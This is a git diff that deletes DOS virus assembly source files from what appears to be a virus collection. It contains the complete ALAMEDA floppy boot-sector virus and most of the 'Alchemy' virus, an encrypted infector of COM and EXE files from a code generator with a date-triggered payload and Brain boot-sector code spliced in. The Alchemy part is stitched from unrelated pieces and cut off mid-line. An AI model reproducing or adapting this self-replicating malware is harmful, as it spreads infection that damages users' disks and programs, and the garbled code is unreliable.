1.44M ) ?', 0 -loc_262: - push cs - pop ds - push cs - pop es - call sub_86 - mov word ptr ds:[1E2h],cs - mov word ptr ds:[1E4h],cs - mov word ptr ds:[1DAh],cs - mov word ptr ds:[1E0h],cs - mov word ptr data_24,0EBFEh - cli ; Disable interrupts - mov word ptr ds:[1E6h],ss - mov word ptr ds:[1E8h],sp - push cs - pop ss - mov sp,2B84h - mov ax,202h - push ax - push cs - mov ax,data_81 - push ax - mov word ptr ds:[1DCh],sp - mov ss,word ptr ds:[1E6h] - mov sp,word ptr ds:[1E8h] - sti ; Enable interrupts - call sub_80 - call sub_23 - call sub_88 - call sub_24 - mov al,0Eh - mov si,19Dh - mov dx,12CCh - call sub_87 - mov al,13h - mov si,1A1h - mov dx,12E6h - call sub_87 - mov al,9 - mov si,199h - mov dx,127Ah - call sub_87 - mov al,8 - mov si,195h - mov dx,11E0h - call sub_87 - mov dx,offset data_222 ; ('') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - mov al,0 - mov dx,2B84h - mov cl,4 - shr dx,cl ; Shift w/zeros fill - add dx,11h - mov ah,31h ; '1' - int 21h ; DOS Services ah=function 31h - ; terminate & stay resident - ; al=return code,dx=paragraphs - -; -; SUBROUTINE -; - -sub_80 proc near - push es - mov es,cs:data_25 - mov dx,es:video_port_ - add dx,6 - mov cs:data_90,dx - pop es - int 11h ; Put equipment bits in ax - mov bh,al - and bh,30h ; '0' - mov data_91,0B800h - cmp bh,30h ; '0' - jne loc_263 ; Jump if not equal - mov data_91,0B000h -loc_263: - mov bh,al - and bh,1 - and ax,0C0h - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - add ah,bh - cmp ah,0 - jne loc_264 ; Jump if not equal - mov dx,offset data_223 ; ('') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - jmp loc_277 -loc_264: - mov al,ah - cmp al,3 - jl loc_265 ; Jump if < - mov al,2 -loc_265: - mov data_28,al - or al,30h ; '0' - mov data_224,al - call sub_81 - retn - -; External Entry into Subroutine - -sub_81: - push ax - push es - push di - mov bx,0Dh - mov dx,0 -loc_266: - mov si,dx - push ax - push bx - push dx - mov ah,8 - int 13h ; Disk dl=drive a ah=func 08h - ; get drive parameters, bl=type - ; cx=cylinders, dh=max heads - ; es:di= ptr to drive table - jc loc_267 ; Jump if carry Set - mov al,bl - dec al - pop dx - pop bx - mov [bx+si],al - pop ax - dec ah - jz loc_268 ; Jump if zero - inc dx - jmp short loc_266 -loc_267: - add sp,6 -loc_268: - pop di - pop es - pop ax - retn - -; External Entry into Subroutine - -sub_82: - mov al,41h ; 'A' - mov dx,0C1Dh - mov di,0 - call sub_85 - retn - -; External Entry into Subroutine - -sub_83: - call sub_82 - call sub_84 - retn - -; External Entry into Subroutine - -sub_84: - mov al,42h ; 'B' - mov dx,0E1Dh - mov di,1 - call sub_85 - retn - -; External Entry into Subroutine - -sub_85: - mov data_225,al - mov si,2C8Bh - call sub_14 - mov al,[di+0Dh] - nop ;*ASM fixup - displacement - cbw ; Convrt byte to word - add ax,ax - mov si,ax - mov bx,offset data_32 - mov si,[bx+si] - call sub_15 - retn - -; External Entry into Subroutine - -sub_86: - mov ah,51h ; 'Q' - int 21h ; DOS Services ah=function 51h - ; get active PSP segment in bx - ;* undocumented function - mov data_231,bx - mov ax,300Eh - mov data_232,ax - xor ax,ax ; Zero register -loc_269: - mov ds,ax - xor si,si ; Zero register - cld ; Clear direction - lodsb ; String [si] to al - cmp al,4Dh ; 'M' - je loc_271 ; Jump if equal -loc_270: - push ds - pop ax - inc ax - jmp short loc_269 -loc_271: - push ds - mov si,data_3e - lodsw ; String [si] to ax - pop bx - add bx,ax - inc bx - jc loc_270 ; Jump if carry Set - cmp cs:data_231,bx - jb loc_270 ; Jump if below - push ds - mov ds,bx - cmp byte ptr ds:data_17e,4Dh ; 'M' - nop ;*ASM fixup - sign extn byte - je loc_272 ; Jump if equal - pop ds - jmp short loc_270 -loc_272: - mov di,cs:data_232 - push cs - pop es - mov bx,ds - pop ds - mov ax,ds - stosw ; Store ax to es:[di] - mov ax,bx - stosw ; Store ax to es:[di] - mov ds,bx -loc_273: - push ds - mov si,data_3e - lodsw ; String [si] to ax - pop bx - add bx,ax - inc bx - mov ax,bx - stosw ; Store ax to es:[di] - mov ds,bx - xor si,si ; Zero register - lodsb ; String [si] to al - cmp al,5Ah ; 'Z' - jne loc_273 ; Jump if not equal - xor ax,ax ; Zero register - stosw ; Store ax to es:[di] - push cs - pop ds - mov si,di - sub si,6 - lodsw ; String [si] to ax - mov data_26,ax - lodsw ; String [si] to ax - mov data_27,ax - mov si,offset data_233 -loc_274: - mov ax,[si] - cmp ax,0 - je loc_275 ; Jump if equal - mov es,ax - mov ax,es:data_2e - add ax,10h - mov es,ax - mov di,data_18e - cmp word ptr es:[di],0EBFEh - je loc_276 ; Jump if equal - add si,2 - jmp short loc_274 -loc_275: - push cs - pop es - retn -loc_276: - mov dx,offset data_221 ; ('') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx -loc_277: - call sub_11 - mov ax,4C00h - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -sub_80 endp - - -; -; SUBROUTINE -; - -sub_87 proc near - push es - push ax - push si - push dx - mov ah,35h ; '5' - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - pop dx - pop si - pop ax - mov [si],bx - mov [si+2],es - mov ah,25h ; '%' - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop es - retn -sub_87 endp - - -; -; SUBROUTINE -; - -sub_88 proc near -loc_278: - call sub_19 - mov dh,8 - mov dl,17h - mov si,2C65h - call sub_14 - mov al,data_28 - cbw ; Convrt byte to word - dec al - mov di,ax - add di,di - mov bx,offset data_229 - call word ptr [bx+di] ;* - mov dh,12h - mov dl,18h - mov si,2C9Eh - call sub_14 - call sub_13 -loc_279: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,0Dh - je loc_ret_282 ; Jump if equal - cmp al,1Bh - jne loc_280 ; Jump if not equal - jmp short loc_ret_282 - db 90h -loc_280: - and al,0DFh - cmp al,59h ; 'Y' - je loc_ret_282 ; Jump if equal - cmp al,4Eh ; 'N' - je loc_281 ; Jump if equal - call sub_11 - jmp short loc_279 -loc_281: - call sub_89 - -loc_ret_282: - retn -sub_88 endp - - -; -; SUBROUTINE -; - -sub_89 proc near - call sub_19 - mov dh,12h - mov dl,0Eh - mov si,2CC2h - call sub_14 - call sub_13 -loc_283: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,31h ; '1' - jge loc_285 ; Jump if > or = -loc_284: - call sub_11 - jmp short loc_283 -loc_285: - cmp al,32h ; '2' - jg loc_284 ; Jump if > - mov data_224,al - and al,0Fh - mov data_28,al - cbw ; Convrt byte to word - push ax - mov dh,8 - mov dl,17h - mov si,2C65h - call sub_14 - mov al,41h ; 'A' - mov byte ptr data_227+62h,al ; ('') - xor di,di ; Zero register - mov bx,0Dh -loc_286: - mov dh,12h - mov dl,0Eh - mov si,2CF8h - call sub_14 - call sub_13 - mov al,33h ; '3' - mov data_102,al - mov data_89,2FCDh - call sub_16 - mov [bx+di],al - push bx - push di - shl di,1 ; Shift w/zeros fill - mov bx,offset data_229 - call word ptr [bx+di] ;* - pop di - pop bx - inc di - pop ax - cmp di,ax - je loc_287 ; Jump if equal - push ax - inc byte ptr data_227+62h ; ('') - jmp short loc_286 -loc_287: - pop ax - jmp loc_278 -sub_89 endp - -data_229 dw offset sub_82 -data_230 dw offset sub_83 -data_231 dw 0 -data_232 dw 0 -data_233 dw 100 dup (0) - -seg_a ends - - - - end start diff --git a/a/ALAMEDA (17).ASM b/a/ALAMEDA (17).ASM deleted file mode 100755 index 287ade7..0000000 --- a/a/ALAMEDA (17).ASM +++ /dev/null @@ -1,381 +0,0 @@ -;-----------------------------------------------------------------------; -; This virus is of the "FLOPPY ONLY" variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. ; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). ; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH - NOP - ; - PUSH DS ;DS=0 ; ES = DS - POP ES ; - ; - MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 1/2 sided!) - JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) - MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; -ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... ; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... - JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) - MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... - JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... - ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... - INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 -A7DFC DB 27H,0,8,2 - \ No newline at end of file diff --git a/a/ALCHEMY (18).ASM b/a/ALCHEMY (18).ASM deleted file mode 100755 index 6e6a62e..0000000 --- a/a/ALCHEMY (18).ASM +++ /dev/null @@ -1,1039 +0,0 @@ -; Alchemy.asm : [Arachnyphobia] by Abraxas -; Created wik the Phalcon/Skism Mass-Produced Code Generator -; from the configuration file skeleton.cfg - -.model tiny ; Handy directive -.code ; Virus code segment - org 100h ; COM file starting IP - -id = 'DA' ; ID word for EXE infections -entry_point: db 0e9h,0,0 ; jmp decrypt - -decrypt: ; handles encryption and decryption -patch_startencrypt: - mov bx,offset startencrypt ; start of decryption - mov cx,(offset heap - offset startencrypt)/2 ; iterations -decrypt_loop: - db 2eh,81h,07h ; add word ptr cs:[bx], xxxx -decrypt_value dw 0 ; initialised at zero for null effect - inc bx ; calculate new decryption location - inc bx - loop decrypt_loop ; decrypt mo' -startencrypt: - call next ; calculate delta offset -next: pop bp ; bp = IP next - sub bp,offset next ; bp = delta offset - - cmp sp,id ; COM or EXE? - je restoreEXE -restoreCOM: - lea si,[bp+save3] - mov di,100h - push di ; For later return - movsb - jmp short restoreEXIT -restoreEXE: - push ds - push es - push cs ; DS = CS - pop ds - push cs ; ES = CS - pop es - lea si,[bp+jmpsave2] - lea di,[bp+jmpsave] - movsw - movsw - movsw -restoreEXIT: - movsw - - mov byte ptr [bp+numinfec],1 ; reset infection counter - - mov ah,1Ah ; Set new DTA - lea dx,[bp+newDTA] ; new DTA @ DS:DX - int 21h - - mov ah,47h ; Get current directory - mov dl,0 ; Current drive - lea si,[bp+origdir] ; DS:SI->buffer - int 21h - mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR - - mov ax,3524h ; Get int 24 handler - int 21h ; to ES:BX - mov word ptr [bp+oldint24],bx; Save it - mov word ptr [bp+oldint24+2],es - mov ah,25h ; Set new int 24 handler - lea dx,[bp+offset int24] ; DS:DX->new handler - int 21h - push cs ; Restore ES - pop es ; 'cuz it was changed - -dir_scan: ; "dot dot" traversal - lea dx,[bp+exe_mask] - call infect_mask - lea dx,[bp+com_mask] - call infect_mask - mov ah,3bh ; change directory - lea dx,[bp+dot_dot] ; "cd .." - int 21h - jnc dir_scan ; go back for mo! - -done_infections: - mov ah,2ah ; Get current date - int 21h - cmp dh,10 ; Check month - jb exit_virus - cmp dl,14 ; Check date - jb exit_virus - cmp cx,1991 ; Check year - jae activate - -exit_virus: - mov ax,2524h ; Restore int 24 handler - lds dx,[bp+offset oldint24] ; to original - int 21h - push cs - pop ds - - mov ah,3bh ; change directory - lea dx,[bp+origdir-1] ; original directory - int 21h - - mov ah,1ah ; restore DTA to default - mov dx,80h ; DTA in PSP - cmp sp,id-4 ; EXE or COM? - jz returnEXE -returnCOM: - int 21h - retn ; 100h is on stack -returnEXE: - pop es - pop ds - int 21h - mov ax,es ; AX = PSP segment - add ax,10h ; Adjust for PSP - add word ptr cs:[bp+jmpsave+2],ax - add ax,word ptr cs:[bp+stacksave+2] - cli ; Clear intrpts for stack manipulation - mov sp,word ptr cs:[bp+stacksave] - mov ss,ax - sti - db 0eah ; jmp ssss:oooo -jmpsave dd ? ; Original CS:IP -stacksave dd ? ; Original SS:SP -jmpsave2 db ? ; Actually four bytes -save3 db 0cdh,20h,0 ; First 3 bytes of COM file -stacksave2 dd ? - -activate: ; Conditions satisfied - org 0 - - cli - jmp entervirus -idbytes db 34h, 12h -firsthead db 0 -firstsector dw 2707h -curhead db 0 -cursector dw 1 - db 0, 0, 0, 0 - db 'Welcome to the Dungeon ' -copyright db '(c) 1986 Brain' - db 17h - db '& Amjads (pvt) Ltd VIRUS_SHOE ' - db ' RECORD v9.0 Dedicated to th' - db 'e dynamic memories of millions o' - db 'f virus who are no longer with u' - db 's today - Thanks GOODNESS!! ' - db ' BEWARE OF THE er..VIRUS : \th' - db 'is program is catching prog' - db 'ram follows after these messeges' - db '..... $' - db '#@%$' - db '@!! ' -entervirus: - mov ax,cs - mov ds,ax ; ds = 0 - mov ss,ax ; set stack to after - mov sp,0F000h ; virus - sti - mov al,ds:[7C00h+offset firsthead] - mov ds:[7C00h+offset curhead],al - mov cx,ds:[7C00h+offset firstsector] - mov ds:[7C00h+offset cursector],cx - call calcnext - mov cx,5 ; read five sectors - mov bx,7C00h+200h ; after end of virus - -loadnext: - call readdisk - call calcnext - add bx,200h - loop loadnext - - mov ax,word ptr ds:[413h] ; Base memory size in Kb - sub ax,7 ; - 7 Kb - mov word ptr ds:[413h],ax ; Insert as new value - mov cl,6 - shl ax,cl ; Convert to paragraphs - mov es,ax - mov si,7C00h ; Copy from virus start - mov di,0 ; to start of memory - mov cx,1004h ; Copy 1004h bytes - cld - rep movsb - push es - mov ax,200h - push ax - retf ; return to old boot sector - -readdisk: - push cx - push bx - mov cx,4 ; Try 4 times - -tryread: - push cx - mov dh,ds:[7C00h+offset curhead] - mov dl,0 ; Read sector from default - mov cx,ds:[7C00h+offset cursector] - mov ax,201h ; Disk to memory at es:bx - int 13h - jnc readOK - mov ah,0 ; Reset disk - int 13h ; (force read track 0) - pop cx - loop tryread - - int 18h ; ROM basic on failure -readOK: - pop cx - pop bx - pop cx - retn - -calcnext: - mov al,byte ptr ds:[7C00h+offset cursector] - inc al - mov byte ptr ds:[7C00h+offset cursector],al - cmp al,0Ah - jne donecalc - mov byte ptr ds:[7C00h+offset cursector],1 - mov al,ds:[7C00h+offset curhead] - inc al - mov ds:[7C00h+offset curhead],al - cmp al,2 - jne donecalc - mov byte ptr ds:[7C00h+offset curhead],0 - inc byte ptr ds:[7C00h+offset cursector+1] -donecalc: - retn - -; the following is a collection of garbage bytes - db 00h, 00h, 00h, 00h, 32h,0E3h - db 23h, 4Dh, 59h,0F4h,0A1h, 82h - db 0BCh,0C3h, 12h, 00h, 7Eh, 12h - db 0CDh, 21h,0A2h, 3Ch, 5Fh -a_data dw 050Ch -; Second part of the virus begins here - jmp short entersecondpart - db '(c) 1986 Brain & Amjads (pvt) Ltd ',0 -readcounter db 4 ; keep track of # reads -curdrive db 0 -int13flag db 0 - -entersecondpart: - mov cs:readcounter,1Fh - xor ax,ax - mov ds,ax ; ds -> interrupt table - mov ax,ds:[13h*4] - mov ds:[6Dh*4],ax - mov ax,ds:[13h*4+2] - mov ds:[6Dh*4+2],ax - mov ax,offset int13 ; 276h - mov ds:[13h*4],ax - mov ax,cs - mov ds:[13h*4+2],ax - mov cx,4 ; 4 tries - xor ax,ax - mov es,ax ; es -> interrupt table - -tryreadbootsector: - push cx - mov dh,cs:firsthead - mov dl,0 - mov cx,cs:firstsector - mov ax,201h ; read from default disk - mov bx,7C00h - int 6Dh ; int 13h - jnc readbootOK - mov ah,0 - int 6Dh ; int 13h - pop cx - loop tryreadbootsector - - int 18h ; ROM basic on failure -readbootOK: ; return control to - ; original boot sector -;* jmp far ptr 0000:7C00h - db 0EAh, 00h, 7Ch, 00h, 00h - nop ; MASM NOP!!! -int13: - sti - cmp ah,2 ; if not read request, - jne doint13 ; do not go further - cmp dl,2 ; if after second floppy, - ja doint13 ; do not go further - cmp ch,0 ; if not reading boot sector, - jne regularread ; go handle as usual - cmp dh,0 ; if boot sector, - je readboot ; do I<-/>/\|> stuff -regularread: - dec cs:readcounter ; Infect after 4 reads - jnz doint13 ; If counter still OK, don't - ; do anything else - jmp short readboot ; Otherwise, try to infect -doint13: - jmp exitint13h -readboot: -; FINISH THIS! - mov cs:int13flag,0 ; clear flag - mov cs:readcounter,4 ; reset counter - push ax - push bx - push cx - push dx - mov cs:curdrive,dl - mov cx,4 - -tryreadbootblock: - push cx - mov ah,0 ; Reset disk - int 6Dh - jc errorreadingbootblock ; Try again - mov dh,0 - mov cx,1 - mov bx,offset readbuffer ; buffer @ 6BEh - push es - mov ax,cs - mov es,ax - mov ax,201h - int 6Dh ; Read boot sector - pop es - jnc continuestuff ; continue if no error -errorreadingbootblock: - pop cx - loop tryreadbootblock - - jmp short resetdisk ; too many failures - nop -continuestuff: - pop cx ; get system id in boot block - mov ax,word ptr cs:[offset readbuffer+4] - cmp ax,1234h ; already infected? - jne dodisk ; if not, infect it - mov cs:int13flag,1 ; flag prev. infection - jmp short noreset -dodisk: - push ds - push es - mov ax,cs - mov ds,ax - mov es,ax - push si - call writevirus ; infect the disk - jc failme ; exit on failure - mov cs:int13flag,2 ; flag success - call changeroot ; manipulate volume label -failme: - pop si - pop es - pop ds - jnc noreset ; don't reset on success -resetdisk: - mov ah,0 ; reset disk - int 6Dh ; int 13h -noreset: - pop dx - pop cx - pop bx - pop ax - cmp cx,1 - jne exitint13h - cmp dh,0 - jne exitint13h - cmp cs:int13flag,1 ; already infected? - jne wasntinfected ; if wasn't, go elsewhere - mov cx,word ptr cs:[offset readbuffer+7] - mov dx,word ptr cs:[offset readbuffer+5] - mov dl,cs:curdrive ; otherwise, read real - jmp short exitint13h ; boot sector -wasntinfected: - cmp cs:int13flag,2 ; successful infection? - jne exitint13h ; if not, just do call - mov cx,cs:firstsector - mov dh,cs:firsthead -exitint13h: - int 6Dh ; int 13h - retf 2 - db 15 dup (0) - -FATManip: ; returns al as error code - jmp short delvedeeper - nop -FATManipreadcounter dw 3 - db ' (c) 1986 Brain & Amjads (pvt) Ltd' -delvedeeper: - call readFAT ; Get FAT ID byte - mov ax,word ptr ds:[offset readbuffer] - cmp ax,0FFFDh ; is it 360K disk? - je is360Kdisk ; continue if so - mov 